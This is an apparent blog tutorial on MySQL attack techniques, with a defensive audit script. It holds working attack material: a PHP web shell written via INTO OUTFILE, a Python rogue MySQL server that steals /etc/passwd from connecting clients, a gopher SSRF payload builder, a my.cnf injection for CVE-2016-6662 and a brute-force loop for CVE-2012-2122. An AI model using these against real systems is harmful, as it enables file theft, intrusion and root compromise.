Uncovering MySQL Exploits: From File Reads to Remote Code Execution

This article provides a comprehensive overview of common MySQL attack techniques—including client‑side arbitrary file reads, SSRF‑based data extraction, server‑side file read/write, remote code execution vulnerabilities (CVE‑2016‑6662), and authentication bypass (CVE‑2012‑2122)—and supplies practical command examples and mitigation insights.

Programmer DD

0x01 Simple Introduction

MySQL is one of the most widely used relational database management systems and is common in web applications.

It was developed by MySQL AB and now belongs to Oracle. MySQL stores data in separate tables, which improves speed and flexibility.

0x02 Basic Commands

In normal usage and during attacks, the following commands are most frequently used.

0x1 Create

create database hehe; -- create database

CREATE TABLE IF NOT EXISTS `runoob_tbl`(
   `runoob_id` INT UNSIGNED AUTO_INCREMENT,
   `runoob_title` VARCHAR(100) NOT NULL,
   `runoob_author` VARCHAR(40) NOT NULL,
   `submission_date` DATE,
   PRIMARY KEY (`runoob_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8; -- create table

0x2 View

show databases;
show tables;
show variables like '%secure%'; -- view secure_file_priv and related variables

LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE test FIELDS TERMINATED BY '\n'; -- read a file from the client host (LOCAL must be enabled on both client and server)

0x3 Add Users and Privileges

CREATE USER 'username'@'host' IDENTIFIED BY 'password';
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION; -- GRANT ... IDENTIFIED BY is 5.x syntax; MySQL 8.0 requires CREATE USER first, then GRANT
DROP USER 'username'@'host';
flush privileges;

0x4 File Read/Write

SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';
SELECT LOAD_FILE('/var/lib/mysql-files/aaa') AS Result;
SELECT group_concat(id) FROM test INTO DUMPFILE "/var/lib/mysql-files/aaaa";

0x03 Attack Surface Analysis

0x1 MySQL client arbitrary file read

Applicable to all MySQL/MariaDB client versions. Condition: the client has LOCAL INFILE enabled (the --enable-local-infile build option, or at run time mysql --local-infile=1; client libraries expose it as MYSQL_OPT_LOCAL_INFILE).

When the option is enabled, a malicious or compromised server can make the connecting client hand over arbitrary local files. The exchange runs as follows.

Key steps include:

Client sends SYN to server (port 3306).

Server replies with greeting packet containing version, protocol, salt, and capability flags.

Client sends authentication packet (username, password, capability flags).

Server validates credentials and sends OK packet.

Client issues normal queries.

Client sends its first query. For the mysql CLI this is its own startup query (select @@version_comment limit 1), so the victim never has to type a LOAD DATA statement.

Server answers not with a result set but with a LOCAL INFILE request packet: 0xFB followed by a file name of the server's choosing.

If LOCAL is enabled, the client opens that file and streams its contents to the server in packets, terminated by an empty packet; the server replies OK. Any file the client process can read is therefore exposed to the server it connected to.
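The exchange above, implemented from the server side as an added example (this is not code from the original article). It uses only the Python standard library and assumes a client that connects with LOCAL INFILE enabled; the server version string, connection id and salt are arbitrary constants. The point to notice is that the file request is sent in reply to whatever query the client issues first.

```python
"""Minimal rogue MySQL server: completes the handshake, then answers the client's
first query with a LOCAL INFILE request for a file of the server's choosing."""
import socket
import struct

CLIENT_LOCAL_FILES = 0x80  # capability bit a client sets when LOCAL INFILE is enabled
# long password, found rows, long flag, connect-with-db, local files, protocol 4.1,
# secure connection (20-byte salt, mysql_native_password)
SERVER_CAPS = 0x1 | 0x2 | 0x4 | 0x8 | 0x80 | 0x200 | 0x8000


def mysql_packet(payload: bytes, seq: int) -> bytes:
    """Frame a payload: 3-byte little-endian length, then a 1-byte sequence id."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def build_greeting(salt: bytes = b"A" * 20, version: bytes = b"5.7.29") -> bytes:
    """HandshakeV10 (packet 0) advertising CLIENT_LOCAL_FILES, as a real server would."""
    assert len(salt) == 20
    body = (
        b"\x0a" + version + b"\x00"            # protocol 10, server version (assumed value)
        + struct.pack("<I", 1)                 # connection id
        + salt[:8] + b"\x00"                   # auth-plugin-data part 1, filler
        + struct.pack("<H", SERVER_CAPS & 0xFFFF)
        + b"\x21"                              # charset utf8_general_ci
        + struct.pack("<H", 0x0002)            # status: SERVER_STATUS_AUTOCOMMIT
        + struct.pack("<H", SERVER_CAPS >> 16)
        + b"\x00" + b"\x00" * 10               # no PLUGIN_AUTH => length byte 0; reserved
        + salt[8:] + b"\x00"                   # auth-plugin-data part 2
    )
    return mysql_packet(body, 0)


def client_supports_local_infile(handshake_response: bytes) -> bool:
    """HandshakeResponse41 starts with 4 little-endian bytes of client capability flags."""
    caps = struct.unpack("<I", handshake_response[:4])[0]
    return bool(caps & CLIENT_LOCAL_FILES)


def build_ok(seq: int) -> bytes:
    """OK_Packet: header 0x00, affected rows 0, last insert id 0, AUTOCOMMIT, 0 warnings."""
    return mysql_packet(b"\x00\x00\x00" + struct.pack("<HH", 0x0002, 0), seq)


def build_local_infile_request(path: bytes, seq: int = 1) -> bytes:
    """0xFB + file name: the packet that makes a LOCAL-enabled client upload that file."""
    return mysql_packet(b"\xfb" + path, seq)


def read_packet(sock):
    """Read one framed packet; returns (sequence id, payload)."""
    header = sock.recv(4)
    if len(header) < 4:
        raise ConnectionError("short header")
    length = struct.unpack("<I", header[:3] + b"\x00")[0]
    payload = b""
    while len(payload) < length:
        chunk = sock.recv(length - len(payload))
        if not chunk:
            raise ConnectionError("short payload")
        payload += chunk
    return header[3], payload


def serve_once(host="0.0.0.0", port=3306, path=b"/etc/passwd") -> bytes:
    """Accept one client, complete the handshake, request `path`, return what the client sent."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    conn, _ = srv.accept()
    with conn:
        conn.sendall(build_greeting())
        _, auth = read_packet(conn)                      # HandshakeResponse41
        conn.sendall(build_ok(2))                        # "login succeeded", whatever was sent
        if not client_supports_local_infile(auth):
            return b""                                   # client refused LOCAL; nothing to take
        _, _query = read_packet(conn)                    # client's first COM_QUERY, any statement
        conn.sendall(build_local_infile_request(path))   # answer it with a file request instead
        data = b""
        while True:
            seq, chunk = read_packet(conn)               # file content arrives in packets...
            if not chunk:
                break                                    # ...terminated by an empty packet
            data += chunk
        conn.sendall(build_ok(seq + 1))
    srv.close()
    return data


if __name__ == "__main__":
    print(serve_once(port=3307).decode(errors="replace"))
```

Pointing a client at it with `mysql --local-infile=1 -h 127.0.0.1 -P 3307 -u anything -p` is enough; the file arrives before the user types anything. The defensive counterpart is the capability check in the client: with LOCAL disabled the 0xFB packet is an error, not a file read.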

0x2 SSRF attack against MySQL

Applicable to all MySQL/MariaDB server versions. Condition: a user account with an empty password. Gopher delivers a one-way byte stream: the attacker never sees the server greeting or its salt, so a real challenge-response cannot be completed, and only an empty auth response can succeed.

By forging MySQL packets via the gopher protocol, an attacker can retrieve data from the server. The stream consists of three parts: the login authentication packet, the client request packets, and the server response packets (the capture below was taken against MySQL 5.1.73).

data = "b500000185a2bf01000000012d0000000000000000000000000000000000000000000000726f6f74000063616368696e675f736861325f70617373776f72640078035f6f73086f737831302e3134095f706c6174666f726d067838365f36340f5f636c69656e745f76657273696f6e06382e302e31380c5f636c69656e745f6e616d65086c69626d7973716c045f706964053432343831076f735f757365720634637431306e0c70726f6772616d5f6e616d65056d7973716c00000003210000000373656c65637420404076657273696f6e5f636f6d6d656e74206c696d697420310d0000000373656c656374206e6f772829"
print(bytes.fromhex(data))  # Python 3; the original used Python 2's str.decode("hex")

Modifying the command portion of the packet allows execution of arbitrary SQL commands.
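Rather than patching bytes inside the capture, the stream can be built from scratch. The following is an added example (not the article's code) that assembles a HandshakeResponse41 for an empty-password user, appends COM_QUERY packets, and percent-encodes the result into a gopher URL; it also splits a raw stream back into packets so captures like the one above can be inspected. The capability set and the mysql_native_password plugin name are assumptions aimed at 5.5+ servers with native-password accounts.

```python
"""Build the byte stream a gopher:// SSRF delivers to MySQL: one HandshakeResponse41
for a user whose password is empty, followed by COM_QUERY packets."""
import struct

CLIENT_LONG_PASSWORD = 0x00000001
CLIENT_LONG_FLAG = 0x00000004
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_TRANSACTIONS = 0x00002000
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000
# Assumed capability set: no SSL, no connect-attrs, no CONNECT_WITH_DB.
CAPS = (CLIENT_LONG_PASSWORD | CLIENT_LONG_FLAG | CLIENT_PROTOCOL_41
        | CLIENT_TRANSACTIONS | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH)


def mysql_packet(payload: bytes, seq: int) -> bytes:
    """3-byte little-endian length, 1-byte sequence id, payload."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def build_handshake_response(user: str, charset: int = 0x21) -> bytes:
    """HandshakeResponse41 carrying a zero-length auth response. Only an account
    whose password is empty accepts this, which is the SSRF's precondition."""
    body = (
        struct.pack("<I", CAPS)
        + struct.pack("<I", 0x01000000)         # max packet size
        + bytes([charset]) + b"\x00" * 23       # charset, reserved
        + user.encode() + b"\x00"
        + b"\x00"                               # auth-response length 0: empty password
        + b"mysql_native_password\x00"          # assumed plugin name
    )
    return mysql_packet(body, 1)                # seq 1 answers the server greeting (seq 0)


def build_com_query(sql: str) -> bytes:
    """COM_QUERY (0x03); every command starts a fresh sequence at 0."""
    return mysql_packet(b"\x03" + sql.encode(), 0)


def build_ssrf_stream(user: str, statements) -> bytes:
    """Auth packet followed by the queries; the server answers them in order and
    the SSRF endpoint echoes back whatever it can of the responses."""
    return build_handshake_response(user) + b"".join(build_com_query(s) for s in statements)


def to_gopher_url(host: str, port: int, payload: bytes) -> str:
    """gopher://host:port/_ plus every byte percent-encoded. The '_' after the slash is
    the gopher item type and is stripped by the client; the rest goes to the socket."""
    return f"gopher://{host}:{port}/_" + "".join(f"%{b:02x}" for b in payload)


def decode_stream(stream: bytes):
    """Split a raw stream into (seq, payload) pairs, e.g. to inspect a capture."""
    packets, i = [], 0
    while i + 4 <= len(stream):
        length = int.from_bytes(stream[i:i + 3], "little")
        packets.append((stream[i + 3], stream[i + 4:i + 4 + length]))
        i += 4 + length
    return packets


if __name__ == "__main__":
    stream = build_ssrf_stream("root", ["select @@version_comment limit 1", "select now()"])
    print(to_gopher_url("127.0.0.1", 3306, stream))
```

Running `decode_stream(bytes.fromhex(data))` on the hex above yields three packets: the 181-byte auth packet with sequence id 1 (user root, empty auth response, caching_sha2_password plugin name and a block of connection attributes), then the two queries, each with sequence id 0. Note that curl appends CRLF after a gopher selector; the two stray bytes arrive after the queries have already executed, so they do no harm.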

0x3 MySQL server file read/write

Applicable to all MySQL/MariaDB server versions. Condition: secure_file_priv permits the target directory, the SQL user holds the FILE privilege, and the mysqld OS user can read or write the path.

The secure_file_priv variable restricts LOAD DATA, SELECT … INTO OUTFILE/DUMPFILE and LOAD_FILE() to a directory. It is read-only at run time, so it can only be changed in my.cnf and takes effect after a restart. Its possible values are:

NULL – import/export disabled entirely.

A directory path (e.g., /var/lib/mysql-files/) – operations limited to that directory; this is the default on most packaged 5.7+ installs.

Empty string – no restriction; together with FILE privilege this is what allows a web shell to be written into the document root.

Example commands:

show variables like '%secure%';
SELECT LOAD_FILE('/var/lib/mysql-files/aaa') AS Result;
create database test;
CREATE TABLE test (id TEXT, content TEXT);
load data infile "/var/lib/mysql-files/aaa" into table test.test FIELDS TERMINATED BY '\n';
select group_concat(id) from test INTO DUMPFILE "/var/lib/mysql-files/aaaa";
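The three states of secure_file_priv only matter in combination with who holds FILE and whether local_infile is on, so a review usually looks at SHOW VARIABLES and SHOW GRANTS together. The following is an added example (not from the article) that does that offline over the row format those statements return; the sample rows and grants are constructed by hand.

```python
"""Offline audit of MySQL file-access settings from SHOW VARIABLES / SHOW GRANTS output."""

# Constructed sample input in the (Variable_name, Value) shape a client returns.
SAMPLE_VARIABLES = [
    ("local_infile", "ON"),
    ("secure_file_priv", ""),
    ("general_log", "OFF"),
    ("general_log_file", "/var/lib/mysql/host.log"),
]
SAMPLE_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' WITH GRANT OPTION"]


def parse_show_variables(rows):
    """rows: iterable of (Variable_name, Value) tuples."""
    return {name: value for name, value in rows}


def classify_secure_file_priv(value):
    """Map the variable to 'disabled', 'unrestricted' or 'restricted'.
    Drivers return None for NULL; the CLI prints the string NULL."""
    if value is None or value == "NULL":
        return "disabled"
    if value == "":
        return "unrestricted"
    return "restricted"


def grants_include_file(grants):
    """FILE is a global privilege, so only `... ON *.*` grants matter; ALL PRIVILEGES implies it."""
    for grant in grants:
        head, _, tail = grant.upper().partition(" ON ")
        if not tail.startswith("*.*"):
            continue
        privs = {p.strip() for p in head.replace("GRANT", "", 1).split(",")}
        if "ALL PRIVILEGES" in privs or "FILE" in privs:
            return True
    return False


def audit_file_access(variables, grants):
    """Return the findings a reviewer would raise; an empty list means nothing to report."""
    findings = []
    state = classify_secure_file_priv(variables.get("secure_file_priv"))
    file_users = grants_include_file(grants)
    if state == "unrestricted":
        severity = "HIGH" if file_users else "MEDIUM"
        findings.append(f"{severity}: secure_file_priv is empty; LOAD_FILE()/INTO OUTFILE may use "
                        "any path the mysqld OS user can reach, including a web root")
    elif state == "restricted" and file_users:
        findings.append(f"INFO: file operations confined to {variables['secure_file_priv']}; "
                        "check that this directory is not served over HTTP")
    if variables.get("local_infile", "OFF").upper() == "ON":
        findings.append("MEDIUM: local_infile=ON; the server accepts LOAD DATA LOCAL "
                        "(client-side file reads additionally need the client option)")
    return findings


if __name__ == "__main__":
    for finding in audit_file_access(parse_show_variables(SAMPLE_VARIABLES), SAMPLE_GRANTS):
        print(finding)
```

A hardened server (secure_file_priv=NULL, local_infile=OFF) produces no findings even when an account still holds FILE, because the privilege has nothing to act on; removing the grant is still good hygiene.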

0x4 MySQL remote code execution / privilege escalation (CVE‑2016‑6662)

Versions: MySQL ≤5.7.14, ≤5.6.32, ≤5.5.51 and related MariaDB/PerconaDB branches.

The general-log variant shown here needs SUPER (for SET GLOBAL) plus a my.cnf location that the mysqld OS user can write and that mysqld_safe reads, such as the data directory; the INTO OUTFILE variant in the original advisory needs FILE and SELECT. The attacker writes a my.cnf whose [mysqld] section sets malloc_lib to an attacker-controlled shared library. On the next restart, mysqld_safe (running as root) puts that library into LD_PRELOAD, so the attacker's code runs with root privileges before mysqld drops them. The trailing [separator] group exists so that the log lines the server appends after the injected text land in a group no program reads.

set global general_log_file = '/usr/local/mysql/data/my.cnf';
set global general_log = on;
select '

; injected config entry

[mysqld]
malloc_lib=/tmp/exploit.so

[separator]

';
set global general_log = off;

0x5 MySQL authentication bypass (CVE‑2012‑2122)

Fixed in MariaDB 5.1.62, 5.2.12, 5.3.6 and 5.5.23, and in MySQL 5.1.63, 5.5.24 and 5.6.6; earlier releases in each of those branches are affected.

check_scramble() returned memcmp()'s int result through a char-sized my_bool. On builds whose optimized memcmp returns values outside -128..127 (certain 64-bit glibc builds with SSE-optimized memcmp), the truncation yields 0 for a wrong password about once in 256 attempts, so knowing a valid username is enough. A simple brute-force loop obtains access:

for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done
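To see why the loop works, the following added example (not from the article) implements the mysql_native_password exchange and the server-side check twice: once as the vulnerable code did it, narrowing memcmp's int to a char-sized my_bool, and once with the fix. memcmp_wide is a constructed stand-in for an optimized memcmp whose return value can leave the char range; the real implementations differ in detail, but only the magnitude of the return value matters here.

```python
"""CVE-2012-2122: mysql_native_password check with the my_bool truncation defect and its fix."""
import hashlib
import random


def sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def stored_hash(password: str) -> bytes:
    """hash_stage2 = SHA1(SHA1(password)), the value kept in mysql.user."""
    return sha1(sha1(password.encode()))


def client_scramble(password: str, salt: bytes) -> bytes:
    """What the client sends: SHA1(pw) XOR SHA1(salt || SHA1(SHA1(pw)))."""
    stage1 = sha1(password.encode())
    return xor(stage1, sha1(salt + sha1(stage1)))


def reassured_hash(scramble: bytes, salt: bytes, hash_stage2: bytes) -> bytes:
    """Server side: undo the XOR to recover stage1, hash it again for comparison."""
    return sha1(xor(scramble, sha1(salt + hash_stage2)))


def memcmp_bytewise(a: bytes, b: bytes) -> int:
    """Textbook memcmp: difference of the first differing bytes, always within -255..255."""
    for x, y in zip(a, b):
        if x != y:
            return x - y
    return 0


def memcmp_wide(a: bytes, b: bytes) -> int:
    """Constructed model of an optimized memcmp that compares 16-bit units and returns
    their difference; values such as 256 or -512 are legal, since only the sign matters."""
    for i in range(0, len(a), 2):
        x = int.from_bytes(a[i:i + 2], "little")
        y = int.from_bytes(b[i:i + 2], "little")
        if x != y:
            return x - y
    return 0


def to_my_bool(value: int) -> int:
    """my_bool is a char: storing an int keeps only the low 8 bits, interpreted signed."""
    return ((value + 128) & 0xFF) - 128


def check_scramble_vulnerable(scramble, salt, hash_stage2, memcmp=memcmp_bytewise) -> bool:
    """Pre-fix logic: `return memcmp(...)` through a my_bool. True means the server
    treats the login as correct, i.e. the truncated result is zero."""
    diff = memcmp(hash_stage2, reassured_hash(scramble, salt, hash_stage2))
    return to_my_bool(diff) == 0


def check_scramble_fixed(scramble, salt, hash_stage2, memcmp=memcmp_bytewise) -> bool:
    """Post-fix logic: reduce to 0/1 before any narrowing can happen."""
    return memcmp(hash_stage2, reassured_hash(scramble, salt, hash_stage2)) == 0


def brute_force(real_password: str, attempts: int, memcmp, seed: int = 1) -> int:
    """Try `attempts` wrong passwords against fresh salts and count how many the
    vulnerable check accepts; with memcmp_wide the rate is roughly 1 in 256."""
    rng = random.Random(seed)
    hash_stage2 = stored_hash(real_password)
    accepted = 0
    for i in range(attempts):
        salt = bytes(rng.randrange(256) for _ in range(20))
        scramble = client_scramble(f"wrong-{i}", salt)
        if check_scramble_vulnerable(scramble, salt, hash_stage2, memcmp):
            accepted += 1
    return accepted


if __name__ == "__main__":
    print("bytewise memcmp:", brute_force("s3cret", 2000, memcmp_bytewise))
    print("wide memcmp:    ", brute_force("s3cret", 2000, memcmp_wide))
```

With the bytewise memcmp no wrong password is ever accepted, because a nonzero value in -255..255 never has a zero low byte. With the wide model, the check passes whenever the first differing 16-bit unit differs by a multiple of 256, which is exactly the one-in-256 behaviour the shell loop above relies on.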

0x04 Summary

This article covered MySQL client arbitrary file read (a rogue server pulling files from connecting clients), SSRF-based data extraction over gopher, server-side file read/write as governed by secure_file_priv, a version-specific remote code execution (CVE-2016-6662) and an old authentication bypass (CVE-2012-2122). Future work will analyze similar attacks on PostgreSQL.


Written by Programmer DD, a tinkering programmer and author of "Spring Cloud Microservices in Action".

0 followers
Reader feedback

How this landed with the community

Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.